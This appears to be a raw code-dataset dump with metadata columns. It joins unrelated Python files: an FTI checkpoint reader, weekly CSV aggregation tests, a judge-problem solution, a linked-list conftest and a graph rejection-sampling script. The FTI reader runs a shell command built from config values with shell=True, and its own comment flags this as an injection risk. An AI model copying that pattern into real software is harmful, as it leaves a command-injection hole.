level_dir = ""  # '/lX/' subdirectory of the selected level, set by process_level()
# This function reads the config_file
# and sets FTI parameters
def init_config_params(config_file):
    """Load FTI runtime settings from *config_file* into module globals.

    Reads the [restart] and [basic] sections of the FTI configuration and
    stores their values (all strings) in the module-level variables.
    Exits with code 2001 when the file does not exist.
    """
    global execution_id
    global ckpt_dir
    global meta_dir
    global global_dir
    global group_size
    global nbHeads
    global nodeSize
    global ioMode
    if not os.path.isfile(config_file):
        print("Configuration file not found")
        sys.exit(2001)
    config = configparser.ConfigParser()
    config.read(config_file)
    execution_id = config['restart']['exec_id']
    ckpt_dir = config['basic']['ckpt_dir']
    meta_dir = config['basic']['meta_dir']
    global_dir = config['basic']['glbl_dir']
    group_size = config['basic']['group_size']
    nbHeads = config['basic']['head']
    nodeSize = config['basic']['node_size']
    ioMode = config['basic']['ckpt_io']
# This function processes FTI's files
# given config_file and set the absolute
# paths of meta files and ckpt files
def process_fti_paths(config_file):
    """Resolve ckpt_dir and meta_dir to absolute paths.

    Sets the module globals ``ckpt_abs_path`` and ``meta_abs_path`` from
    the (possibly relative) directories read from the configuration.
    NOTE(review): the relative-path branches call os.chdir(), so this
    function changes the process working directory as a side effect.
    """
    global ckpt_dir
    global meta_dir
    global ckpt_abs_path
    global meta_abs_path
    # ckpt dir
    dir_path = os.path.dirname(os.path.realpath(config_file))
    # concatenate paths
    if level_dir == '/l4/':
        # level 4 checkpoints live in the global (PFS) directory
        # switch to global_dir
        ckpt_dir = global_dir
    if ckpt_dir.startswith('./') is True: # same directory as config
        ckpt_abs_path = dir_path + ckpt_dir.replace('.', '')
    elif "." not in ckpt_dir: # absolute path
        # set dir
        ckpt_abs_path = ckpt_dir
    else: # relative path
        # iterate over the number of '../' found in ckpt_path
        os.chdir(dir_path)
        dirs = ckpt_dir.count("..")
        for i in range(dirs):
            os.chdir("..")
        # concatenate the remaining part
        for i in range(dirs):
            # remove ../
            ckpt_dir = ckpt_dir.replace('../', '')
        os.chdir(ckpt_dir)
        ckpt_abs_path = os.getcwd()
    print("ckpt_abs_path ", ckpt_abs_path)
    # meta dir (same resolution logic as above, applied to meta_dir)
    dir_path = os.path.dirname(os.path.realpath(config_file))
    print(dir_path)
    # concatenate paths
    if meta_dir.startswith('./') is True: # same directory as config
        # omit dot + concatenate the rest of the path
        meta_abs_path = dir_path + meta_dir.replace('.', '')
    elif "." not in meta_dir: # absolute path
        # set dir
        meta_abs_path = meta_dir
    else: # relative path
        # iterate over the number of '../' found in ckpt_path
        os.chdir(dir_path)
        dirs = meta_dir.count("..")
        for i in range(dirs):
            os.chdir("..")
        # concatenate the remaining part
        for i in range(dirs):
            # remove ../
            meta_dir = meta_dir.replace('../', '')
        os.chdir(meta_dir)
        meta_abs_path = os.getcwd()
    print("meta_abs_path ", meta_abs_path)
# This function returns the path of the
# ckpt corresponding to rank_id
def find_ckpt_file(rank_id):
    """Walk ``ckpt_abs_path`` and return the checkpoint file of *rank_id*.

    For level 4 with MPI-IO (ioMode == "2") the shared checkpoint is first
    converted to per-rank POSIX format via recover_mpiio_l4().
    Exits with code 2002 when no matching file is found.
    """
    pattern_ckpt_file = ""
    pattern_ckpt_path = execution_id+level_dir
    if level_dir == '/l1/' or level_dir == '/l4/': # local
        pattern_ckpt_file = "*-Rank"+str(rank_id)+".fti"
    if level_dir == '/l4/' and ioMode == "2": # global
        pattern_ckpt_file = "-mpiio.fti"#Ckpt1-mpiio.fti
    ckpt_file = ""
    # NOTE(review): the '*-Rank...' pattern contains a literal '*' but is
    # matched with a substring test below — verify fnmatch-style matching
    # was not intended here.
    for root, dirs, files in os.walk(os.path.abspath(ckpt_abs_path)):
        for file in files:
            file = os.path.join(root, file)
            if pattern_ckpt_path in file and pattern_ckpt_file in file:
                ckpt_file = file
    if level_dir == '/l4/' and ioMode == "2": # global
        PFSfile = ckpt_file
        # recover from L4 to tmp/
        ckpt_file = recover_mpiio_l4(rank_id, PFSfile)
    if ckpt_file == "":
        print("Checkpoint file not found")
        sys.exit(2002)
    return ckpt_file
# This function is called if io=2 and level=4
# it recovers the file from l4 directory in mpiio format
# to tmp/file in posix format
def recover_mpiio_l4(rank_id, PFSfile):
    """Convert an MPI-IO level-4 checkpoint to POSIX format under ./tmp.

    Runs the external ``mpiio_main`` helper for *rank_id* against the
    shared checkpoint *PFSfile* and returns the path of the recovered
    POSIX checkpoint file. Exits when the recovery produced nothing.
    NOTE(review): this changes the working directory to ./mpiio/ and
    builds a shell command (shell=True) from config-derived values —
    review for command-injection risk if the config is untrusted.
    """
    # preparing input for mpiio recovery
    global nodeSize
    global nbApprocs
    global nbNodes
    global nbHeads
    nodeSize = int(nodeSize)
    nbHeads = int(nbHeads)
    nbApprocs = nodeSize - nbHeads
    nbNodes = totalRanks / nodeSize if nodeSize else 0
    nbNodes = int(nbNodes)
    executable_path = "./mpiio/"
    # get fileSize from metafile
    # read ckpt_file_size entry of second section
    fileSize = 0
    meta_pattern = "sector"
    meta_file = ""
    for root, dirs, files in os.walk(os.path.abspath(meta_abs_path)):
        for file in files:
            if file.startswith(meta_pattern) is True:
                file = os.path.join(root, file)
                print(file)
                meta_file = file
                break
    # processing the meta file for the size
    config = configparser.ConfigParser()
    config.read(meta_file)
    fileSize = config['0']['ckpt_file_size']
    os.chdir(executable_path)
    cmd = "./mpiio_main "+str(rank_id)+" "+str(PFSfile)+" "+str(fileSize)+" "+str(nbApprocs)+" "+str(nbNodes)
    subprocess.check_call(cmd, shell=True)
    print("Rank ", str(rank_id), " is done copying...")
    print(
        "MPI-IO recovery finished successfully. "
        "Now current dir is",
        os.getcwd())
    # look for what has been stored under /tmp
    ckpt_path = os.getcwd()+"/tmp" # Ckpt1-mpiio.fti
    pattern_ckpt_file = "*.fti"
    ckpt_file = ""
    # find file in this directory
    for root, dirs, files in os.walk(os.path.abspath(ckpt_path)):
        for file in files:
            file = os.path.join(root, file)
            if fnmatch(file, pattern_ckpt_file):
                ckpt_file = file
    if ckpt_path == "":
        print("Could not recover from MPI-IO")
        sys.exit()
    return ckpt_file
# This function returns the path of the
# meta corresponding to the ckpt_file
# note: for now it works with level 1
def find_meta_file(ckpt_file):
    """Return the FTI metadata file describing *ckpt_file*.

    For level-4 MPI-IO any sector file is taken; otherwise each metadata
    file is parsed and matched against the checkpoint's basename via its
    ckpt_file_name entries. Exits with code 2004 when nothing matches.
    """
    meta_file = ""
    if level_dir == '/l4/' and ioMode == "2":
        print("should take any sector file")
        for path, subdirs, files in os.walk(meta_abs_path):
            for file in files:
                file = meta_abs_path+'/'+execution_id+level_dir+file
                meta_file = file
                break
    # traverse all meta files in the directory
    else: # levels (1,2,3)
        for path, subdirs, files in os.walk(meta_abs_path):
            for file in files:
                file = meta_abs_path+'/'+execution_id+level_dir+file
                if os.path.isfile(file) is True:
                    config = configparser.ConfigParser()
                    config.read(file)
                    ckpt = ckpt_file.rsplit('/', 1)[1]
                    for section in config.sections():
                        if section.isdigit() is True:
                            # NOTE(review): this break only exits the section
                            # loop; the outer file walk keeps running.
                            if config[section]['ckpt_file_name'] == ckpt:
                                meta_file = file
                                break
    if meta_file == "":
        print("Metadata file not found")
        sys.exit(2004)
    return meta_file
# This function sets FTI's files paths
# depending on the level where the ckpt is stored
def process_level(level):
    """Point the module-global ``level_dir`` at the directory for *level*.

    E.g. ``process_level(1)`` sets ``level_dir`` to ``'/l1/'``.
    """
    global level_dir
    level_dir = "/l{0}/".format(level)
# This function compares ckpt directories
# and returns the level to which the last ckpt was stored
def get_latest_ckpt():
    """Return the level digit (as a string) of the newest checkpoint dir.

    Scans the subdirectories of the module-global ``ckpt_abs_path``
    (named 'l1', 'l2', ...), picks the most recently modified one and
    returns the character after the leading 'l', e.g. '1'.
    """
    candidates = glob.glob(os.path.join(ckpt_abs_path, '*/'))
    newest = max(candidates, key=os.path.getmtime)
    # glob('*/') yields paths with a trailing '/', so the directory name is
    # the second-to-last '/'-separated component: '.../l1/' -> 'l1'.
    dir_name = newest.rsplit('/', 2)[-2]
    return dir_name[1]
# API to read the checkpoints given config and rank
# def read_checkpoints(config_file, rank_id, level=None, output=None):
def read_checkpoints(config_file, rank_id, ranks=None,
                     level=None, output=None):
    """Read the checkpoint of ``rank_id`` as described by ``config_file``.

    :param config_file: path to the FTI configuration file.
    :param rank_id: MPI rank whose checkpoint should be read.
    :param ranks: total number of ranks; required when reading MPI-IO
        checkpoints from level 4.
    :param level: FTI checkpoint level to read; when ``None`` the most
        recently written level is used.
    :param output: 'CSV' (default), 'HDF5' or 'data'; with 'data' the
        decoded checkpoint is returned as a numpy array.
    """
    init_config_params(config_file)
    if level in fti_levels:
        process_level(level)
    elif level is None:
        # No level given: fall back to the most recently written one.
        last_level = get_latest_ckpt()
        # BUGFIX: previously called process_level(level) with level=None,
        # which produced the bogus directory '/lNone/' instead of using
        # the detected latest level.
        process_level(last_level)
    else:
        # invalid fti level
        print("Invalid FTI level")
        sys.exit(1001)
    if output is not None and output not in output_formats:
        print("Wrong output format. Choose one")
        print("CSV (default):: Comma Separated Values file")
        print("HDF5 :: Hierarchical Data Format file")
        print("data :: numpy array")
        sys.exit(1002)
    elif output is None:
        # default output format (CSV)
        output = 'CSV'
    # BUGFIX: compare as strings -- ioMode comes from configparser and is a
    # string ("2", as checked elsewhere), so the previous `ioMode == 2`
    # (int) test could never trigger.
    if str(level) == "4" and str(ioMode) == "2" and ranks is None:
        print("Total # of ranks is required when reading MPI-IO"
              " chekpoints from level 4")
        sys.exit(1003)
    global totalRanks
    totalRanks = ranks
    process_fti_paths(config_file)
    ckpt_file = find_ckpt_file(rank_id)
    meta_file = find_meta_file(ckpt_file)
    print("Processing ", ckpt_file, " using meta ", meta_file)
    if output == "data":
        return posix_read_ckpts.read_checkpoint(
            ckpt_file, meta_file, config_file, group_size, level, output)
    else:
        posix_read_ckpts.read_checkpoint(
            ckpt_file, meta_file, config_file, group_size, level, output)
| 8,326 | 0 | 176 |
b15a0e4cd2f7f657e116c512dee66346dc5c3c3d | 10,882 | py | Python | tests/test_projectcounts/test_weekly_aggregation.py | wikimedia/analytics-aggregator | e07c0dc2d3102a591e5e968a7e4c49499770fe39 | [
"Apache-2.0"
] | 1 | 2018-01-09T07:49:21.000Z | 2018-01-09T07:49:21.000Z | tests/test_projectcounts/test_weekly_aggregation.py | wikimedia/analytics-aggregator | e07c0dc2d3102a591e5e968a7e4c49499770fe39 | [
"Apache-2.0"
] | null | null | null | tests/test_projectcounts/test_weekly_aggregation.py | wikimedia/analytics-aggregator | e07c0dc2d3102a591e5e968a7e4c49499770fe39 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Unit tests for weekly per project aggregation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This module contains tests for weekly per project aggregation of
aggregator.projectcounts.
"""
import aggregator
import testcases
import os
import datetime
class WeeklyProjectAggregationTestCase(testcases.ProjectcountsDataTestCase):
"""TestCase for 'weekly' project aggregation functions"""
| 36.516779 | 76 | 0.529314 | # -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Unit tests for weekly per project aggregation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This module contains tests for weekly per project aggregation of
aggregator.projectcounts.
"""
import aggregator
import testcases
import os
import datetime
class WeeklyProjectAggregationTestCase(testcases.ProjectcountsDataTestCase):
    """TestCase for 'weekly' project aggregation functions"""
    # Daily CSV rows look like 'YYYY-MM-DD,total,desktop,mobile,zero' and the
    # weekly output rows like 'YYYYWww,total,desktop,mobile,zero' -- presumably
    # sums over the ISO week's days (TODO confirm against aggregator docs).
    def test_weekly_csv_non_existing_csv(self):
        """A fresh weekly CSV is created with the aggregated week."""
        enwiki_file_abs = os.path.join(self.weekly_dir_abs, 'enwiki.csv')
        first_date = datetime.date(2014, 7, 1)
        last_date = datetime.date(2014, 7, 7)
        csv_data = {
            '2014-06-29': '2014-06-29,1,2,3,4',
            '2014-06-30': '2014-06-30,1002,1000,1,1',
            '2014-07-01': '2014-07-01,2003,2000,2,1',
            '2014-07-02': '2014-07-02,3004,3000,3,1',
            '2014-07-03': '2014-07-03,4005,4000,4,1',
            '2014-07-04': '2014-07-04,5006,5000,5,1',
            '2014-07-05': '2014-07-05,6007,6000,6,1',
            '2014-07-06': '2014-07-06,7008,7000,7,1',
            '2014-07-07': '2014-07-07,5,6,7,8',
        }
        aggregator.update_weekly_csv(self.data_dir_abs, 'enwiki', csv_data,
                                     first_date, last_date)
        self.assert_file_content_equals(enwiki_file_abs, [
            '2014W27,28035,28000,28,7',
        ])
    def test_weekly_csv_existing_csv_existing_week(self):
        """Existing week rows are kept untouched without force."""
        enwiki_file_abs = os.path.join(self.weekly_dir_abs, 'enwiki.csv')
        self.create_file(enwiki_file_abs, [
            '2014W26,1,2,3,4',
            '2014W27,4,5,6,7',
            '2014W28,8,9,10,11',
        ])
        first_date = datetime.date(2014, 7, 1)
        last_date = datetime.date(2014, 7, 7)
        csv_data = {
            '2014-06-29': '2014-06-29,1,2,3,4',
            '2014-06-30': '2014-06-30,1002,1000,1,1',
            '2014-07-01': '2014-07-01,2003,2000,2,1',
            '2014-07-02': '2014-07-02,3004,3000,3,1',
            '2014-07-03': '2014-07-03,4005,4000,4,1',
            '2014-07-04': '2014-07-04,5006,5000,5,1',
            '2014-07-05': '2014-07-05,6007,6000,6,1',
            '2014-07-06': '2014-07-06,7008,7000,7,1',
            '2014-07-07': '2014-07-07,5,6,7,8',
        }
        aggregator.update_weekly_csv(self.data_dir_abs, 'enwiki', csv_data,
                                     first_date, last_date)
        self.assert_file_content_equals(enwiki_file_abs, [
            '2014W26,1,2,3,4',
            '2014W27,4,5,6,7',
            '2014W28,8,9,10,11',
        ])
    def test_weekly_csv_existing_csv_existing_week_force(self):
        """With force_recomputation the existing week row is recomputed."""
        enwiki_file_abs = os.path.join(self.weekly_dir_abs, 'enwiki.csv')
        self.create_file(enwiki_file_abs, [
            '2014W26,1,2,3,4',
            '2014W27,4,5,6,7',
            '2014W28,8,9,10,11',
        ])
        first_date = datetime.date(2014, 7, 1)
        last_date = datetime.date(2014, 7, 7)
        csv_data = {
            '2014-06-29': '2014-06-29,1,2,3,4',
            '2014-06-30': '2014-06-30,1002,1000,1,1',
            '2014-07-01': '2014-07-01,2003,2000,2,1',
            '2014-07-02': '2014-07-02,3004,3000,3,1',
            '2014-07-03': '2014-07-03,4005,4000,4,1',
            '2014-07-04': '2014-07-04,5006,5000,5,1',
            '2014-07-05': '2014-07-05,6007,6000,6,1',
            '2014-07-06': '2014-07-06,7008,7000,7,1',
            '2014-07-07': '2014-07-07,5,6,7,8',
        }
        aggregator.update_weekly_csv(self.data_dir_abs, 'enwiki', csv_data,
                                     first_date, last_date,
                                     force_recomputation=True)
        self.assert_file_content_equals(enwiki_file_abs, [
            '2014W26,1,2,3,4',
            '2014W27,28035,28000,28,7',
            '2014W28,8,9,10,11',
        ])
    def test_weekly_csv_existing_csv_bad_dates_existing_week(self):
        """Bad dates inside the week are skipped from the aggregation."""
        enwiki_file_abs = os.path.join(self.weekly_dir_abs, 'enwiki.csv')
        self.create_file(enwiki_file_abs, [
            '2014W26,1,2,3,4',
            '2014W27,4,5,6,7',
            '2014W28,8,9,10,11',
        ])
        first_date = datetime.date(2014, 7, 1)
        last_date = datetime.date(2014, 7, 7)
        csv_data = {
            '2014-06-29': '2014-06-29,1,2,3,4',
            '2014-06-30': '2014-06-30,1002,1000,1,1',
            '2014-07-01': '2014-07-01,2003,2000,2,1',
            '2014-07-02': '2014-07-02,3004,3000,3,1',
            '2014-07-04': '2014-07-04,5006,5000,5,1',
            '2014-07-05': '2014-07-05,6007,6000,6,1',
            '2014-07-06': '2014-07-06,7008,7000,7,1',
            '2014-07-07': '2014-07-07,5,6,7,8',
        }
        bad_dates = [
            datetime.date(2014, 7, 3),
            datetime.date(2014, 7, 4),
        ]
        aggregator.update_weekly_csv(self.data_dir_abs, 'enwiki', csv_data,
                                     first_date, last_date, bad_dates)
        self.assert_file_content_equals(enwiki_file_abs, [
            '2014W26,1,2,3,4',
            '2014W27,26633,26600,26,7',
            '2014W28,8,9,10,11',
        ])
    def test_weekly_csv_existing_csv_bad_sunday(self):
        """A bad Sunday is handled like any other bad date of the week."""
        enwiki_file_abs = os.path.join(self.weekly_dir_abs, 'enwiki.csv')
        self.create_file(enwiki_file_abs, [
            '2014W26,1,2,3,4',
            '2014W27,4,5,6,7',
            '2014W28,8,9,10,11',
        ])
        first_date = datetime.date(2014, 7, 1)
        last_date = datetime.date(2014, 7, 7)
        csv_data = {
            '2014-06-29': '2014-06-29,1,2,3,4',
            '2014-06-30': '2014-06-30,1002,1000,1,1',
            '2014-07-01': '2014-07-01,2003,2000,2,1',
            '2014-07-02': '2014-07-02,3004,3000,3,1',
            '2014-07-04': '2014-07-04,5006,5000,5,1',
            '2014-07-05': '2014-07-05,6007,6000,6,1',
            '2014-07-06': '2014-07-06,7008,7000,7,1',
            '2014-07-07': '2014-07-07,5,6,7,8',
        }
        bad_dates = [
            datetime.date(2014, 7, 3),
            datetime.date(2014, 7, 4),
            datetime.date(2014, 7, 6),
        ]
        aggregator.update_weekly_csv(self.data_dir_abs, 'enwiki', csv_data,
                                     first_date, last_date, bad_dates)
        self.assert_file_content_equals(enwiki_file_abs, [
            '2014W26,1,2,3,4',
            '2014W27,21028,21000,21,7',
            '2014W28,8,9,10,11',
        ])
    def test_weekly_csv_existing_csv_only_bad_dates_no_existing_data(self):
        """An all-bad week with no existing row leaves the file unchanged."""
        enwiki_file_abs = os.path.join(self.weekly_dir_abs, 'enwiki.csv')
        self.create_file(enwiki_file_abs, [
            '2014W26,1,2,3,4',
            '2014W28,8,9,10,11',
        ])
        first_date = datetime.date(2014, 7, 1)
        last_date = datetime.date(2014, 7, 7)
        csv_data = {
            '2014-06-29': '2014-06-29,1,2,3,4',
            '2014-06-30': '2014-06-30,1002,1000,1,1',
            '2014-07-01': '2014-07-01,2003,2000,2,1',
            '2014-07-02': '2014-07-02,3004,3000,3,1',
            '2014-07-04': '2014-07-04,5006,5000,5,1',
            '2014-07-05': '2014-07-05,6007,6000,6,1',
            '2014-07-06': '2014-07-06,7008,7000,7,1',
            '2014-07-07': '2014-07-07,5,6,7,8',
        }
        bad_dates = [
            datetime.date(2014, 6, 30),
            datetime.date(2014, 7, 1),
            datetime.date(2014, 7, 2),
            datetime.date(2014, 7, 3),
            datetime.date(2014, 7, 4),
            datetime.date(2014, 7, 5),
            datetime.date(2014, 7, 6),
        ]
        aggregator.update_weekly_csv(self.data_dir_abs, 'enwiki', csv_data,
                                     first_date, last_date, bad_dates)
        self.assert_file_content_equals(enwiki_file_abs, [
            '2014W26,1,2,3,4',
            '2014W28,8,9,10,11',
        ])
    def test_weekly_csv_existing_csv_only_bad_dates_existing_data(self):
        """An all-bad week drops the previously existing row for that week."""
        enwiki_file_abs = os.path.join(self.weekly_dir_abs, 'enwiki.csv')
        self.create_file(enwiki_file_abs, [
            '2014W26,1,2,3,4',
            '2014W27,4,5,6,7',
            '2014W28,8,9,10,11',
        ])
        first_date = datetime.date(2014, 7, 1)
        last_date = datetime.date(2014, 7, 7)
        csv_data = {
            '2014-06-29': '2014-06-29,1,2,3,4',
            '2014-06-30': '2014-06-30,1002,1000,1,1',
            '2014-07-01': '2014-07-01,2003,2000,2,1',
            '2014-07-02': '2014-07-02,3004,3000,3,1',
            '2014-07-04': '2014-07-04,5006,5000,5,1',
            '2014-07-05': '2014-07-05,6007,6000,6,1',
            '2014-07-06': '2014-07-06,7008,7000,7,1',
            '2014-07-07': '2014-07-07,5,6,7,8',
        }
        bad_dates = [
            datetime.date(2014, 6, 30),
            datetime.date(2014, 7, 1),
            datetime.date(2014, 7, 2),
            datetime.date(2014, 7, 3),
            datetime.date(2014, 7, 4),
            datetime.date(2014, 7, 5),
            datetime.date(2014, 7, 6),
        ]
        aggregator.update_weekly_csv(self.data_dir_abs, 'enwiki', csv_data,
                                     first_date, last_date, bad_dates)
        self.assert_file_content_equals(enwiki_file_abs, [
            '2014W26,1,2,3,4',
            '2014W28,8,9,10,11',
        ])
    def test_weekly_csv_zero_and_missing_data(self):
        """Zero-valued and blank CSV fields are tolerated while aggregating."""
        enwiki_file_abs = os.path.join(self.weekly_dir_abs, 'enwiki.csv')
        first_date = datetime.date(2014, 7, 1)
        last_date = datetime.date(2014, 7, 7)
        csv_data = {
            '2014-06-29': '2014-06-29,1,2,3,4',
            '2014-06-30': '2014-06-30,1002,1000,1,1',
            '2014-07-01': '2014-07-01,   3,   0,2,1',
            '2014-07-02': '2014-07-02,3001,3000, ,1',
            '2014-07-03': '2014-07-03,4005,4000,4,1',
            '2014-07-04': '2014-07-04,5006,5000,5,1',
            '2014-07-05': '2014-07-05,6007,6000,6,1',
            '2014-07-06': '2014-07-06,7008,7000,7,1',
            '2014-07-07': '2014-07-07,5,6,7,8',
        }
        aggregator.update_weekly_csv(self.data_dir_abs, 'enwiki', csv_data,
                                     first_date, last_date)
        self.assert_file_content_equals(enwiki_file_abs, [
            '2014W27,26036,26000,29,7',
        ])
| 9,697 | 0 | 215 |
4dfca50f1b3f1df35c4e5dbc925eb02663bd476e | 608 | py | Python | python/2542 - Iu-Di-Oh!.py | kaiosatiro/URIjudge_beecrowd | e646c771384e77e6b6e38d88f58aa8c61f0a3cb7 | [
"MIT"
] | null | null | null | python/2542 - Iu-Di-Oh!.py | kaiosatiro/URIjudge_beecrowd | e646c771384e77e6b6e38d88f58aa8c61f0a3cb7 | [
"MIT"
] | null | null | null | python/2542 - Iu-Di-Oh!.py | kaiosatiro/URIjudge_beecrowd | e646c771384e77e6b6e38d88f58aa8c61f0a3cb7 | [
"MIT"
] | null | null | null | while True:
try:
n = int(input())
m,l = map(int, input().split(' '))
m_dic = {}
l_dic = {}
for i in range(1, m+1):
m_dic[i] = list(map(int, input().split(' ')))
for i in range(1, l+1):
l_dic[i] = list(map(int, input().split(' ')))
cm, cl = map(int, input().split(' '))
a = int(input())
m = m_dic[cm][a-1]
l = l_dic[cl][a-1]
if m > l:
print('Marcos')
elif l > m:
print('Leonardo')
else:
print('Empate')
except EOFError:
break | 23.384615 | 57 | 0.404605 | while True:
try:
n = int(input())
m,l = map(int, input().split(' '))
m_dic = {}
l_dic = {}
for i in range(1, m+1):
m_dic[i] = list(map(int, input().split(' ')))
for i in range(1, l+1):
l_dic[i] = list(map(int, input().split(' ')))
cm, cl = map(int, input().split(' '))
a = int(input())
m = m_dic[cm][a-1]
l = l_dic[cl][a-1]
if m > l:
print('Marcos')
elif l > m:
print('Leonardo')
else:
print('Empate')
except EOFError:
break | 0 | 0 | 0 |
7ddbe2a2af26ca48666b40b82ce35ef3a04ace79 | 437 | py | Python | data_structures/linked-list/conftest.py | zarkle/data-structures-and-algorithms | 0485b95f5aabc0ee255cd7e50b48a6ccec851e00 | [
"MIT"
] | 1 | 2021-01-28T07:32:17.000Z | 2021-01-28T07:32:17.000Z | data_structures/linked-list/conftest.py | zarkle/data-structures-and-algorithms | 0485b95f5aabc0ee255cd7e50b48a6ccec851e00 | [
"MIT"
] | null | null | null | data_structures/linked-list/conftest.py | zarkle/data-structures-and-algorithms | 0485b95f5aabc0ee255cd7e50b48a6ccec851e00 | [
"MIT"
] | 1 | 2020-04-10T08:01:50.000Z | 2020-04-10T08:01:50.000Z | import pytest
from linked_list import LinkedList as LL
@pytest.fixture
def empty_ll():
"""fixture for empty array"""
return LL()
@pytest.fixture
def small_ll():
"""fixture for short array"""
return LL([1, 2, 3, 4])
@pytest.fixture
def short_ll():
"""fixture for short array"""
return LL([5, 6, 7, 8])
@pytest.fixture
def long_ll():
"""fixture for long array"""
return LL([11, 12, 13, 14, 15, 16])
| 16.185185 | 40 | 0.624714 | import pytest
from linked_list import LinkedList as LL
@pytest.fixture
def empty_ll():
"""fixture for empty array"""
return LL()
@pytest.fixture
def small_ll():
"""fixture for short array"""
return LL([1, 2, 3, 4])
@pytest.fixture
def short_ll():
"""fixture for short array"""
return LL([5, 6, 7, 8])
@pytest.fixture
def long_ll():
"""fixture for long array"""
return LL([11, 12, 13, 14, 15, 16])
| 0 | 0 | 0 |
4eb9be9e5bdd2a42932ae0913e83fcaa9ef5590a | 2,403 | py | Python | graph_sampler/reject_to_uniform.py | shaun95/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | 1 | 2022-03-13T21:48:52.000Z | 2022-03-13T21:48:52.000Z | graph_sampler/reject_to_uniform.py | shaun95/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | null | null | null | graph_sampler/reject_to_uniform.py | shaun95/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | 1 | 2022-03-30T07:20:29.000Z | 2022-03-30T07:20:29.000Z | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/usr/bin/python
r"""Reject graphs based on importance to produce a uniform sample set.
Usage:
prefix=3_COFH
./reject_to_uniform.py \
--in_file=weighted/${prefix}.graphml \
--out_file=uniform/${prefix}.graphml
"""
from absl import app
from absl import flags
from graph_sampler import graph_io
from graph_sampler import molecule_sampler
FLAGS = flags.FLAGS
flags.DEFINE_string('in_file', None, 'Input file path.')
flags.DEFINE_string('out_file', None, 'Output file path.')
flags.DEFINE_string('seed', None, 'Seed used for random number generation.')
if __name__ == '__main__':
flags.mark_flags_as_required(['in_file', 'out_file'])
app.run(main)
| 32.917808 | 76 | 0.718685 | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/usr/bin/python
r"""Reject graphs based on importance to produce a uniform sample set.
Usage:
prefix=3_COFH
./reject_to_uniform.py \
--in_file=weighted/${prefix}.graphml \
--out_file=uniform/${prefix}.graphml
"""
from absl import app
from absl import flags
from graph_sampler import graph_io
from graph_sampler import molecule_sampler
# Command-line flags consumed by main() below.
FLAGS = flags.FLAGS
flags.DEFINE_string('in_file', None, 'Input file path.')
flags.DEFINE_string('out_file', None, 'Output file path.')
flags.DEFINE_string('seed', None, 'Seed used for random number generation.')
def main(argv):
  """Rejection-sample FLAGS.in_file's weighted graphs into a uniform set.

  Reads graphs and their stats from FLAGS.in_file, rejects based on each
  graph's importance relative to the maximum, and writes the accepted
  graphs plus summary stats to FLAGS.out_file.
  """
  if len(argv) > 1:
    raise RuntimeError(f'Unexpected arguments: {argv[1:]}')
  input_stats = graph_io.get_stats(FLAGS.in_file)
  max_importance = input_stats['max_final_importance']
  with open(FLAGS.in_file) as input_file:
    rejector = molecule_sampler.RejectToUniform(
        base_iter=graph_io.graph_reader(input_file),
        max_importance=max_importance,
        rng_seed=FLAGS.seed)
    with open(FLAGS.out_file, 'w') as output_file:
      for graph in rejector:
        graph_io.write_graph(graph, output_file)
        # Periodic progress report, every 10000 accepted graphs.
        if rejector.num_accepted % 10000 == 0:
          acc = rejector.num_accepted
          proc = rejector.num_processed
          print(f'Accepted {acc}/{proc}: {acc / proc * 100:.2f}%')
      # Append summary statistics after the last graph record.
      output_stats = dict(
          num_samples=rejector.num_accepted,
          estimated_num_graphs=input_stats['estimated_num_graphs'],
          rng_seed=rejector.rng_seed)
      graph_io.write_stats(output_stats, output_file)
  acc = rejector.num_accepted
  proc = rejector.num_processed
  print(f'Done rejecting to uniform! Accepted {acc}/{proc}: '
        f'{acc / proc * 100:.2f}%')
if __name__ == '__main__':
  # Both the input and output paths are mandatory.
  flags.mark_flags_as_required(['in_file', 'out_file'])
  app.run(main)
| 1,107 | 0 | 23 |
131cadd4426c23dcd44f31279f6c1992ea0649c5 | 47,673 | py | Python | reana_client/cli/workflow.py | VMois/reana-client | 206a7fb5762ac28a97095ad774e88054af53b2f7 | [
"MIT"
] | null | null | null | reana_client/cli/workflow.py | VMois/reana-client | 206a7fb5762ac28a97095ad774e88054af53b2f7 | [
"MIT"
] | null | null | null | reana_client/cli/workflow.py | VMois/reana-client | 206a7fb5762ac28a97095ad774e88054af53b2f7 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# This file is part of REANA.
# Copyright (C) 2017, 2018 CERN.
#
# REANA is free software; you can redistribute it and/or modify it
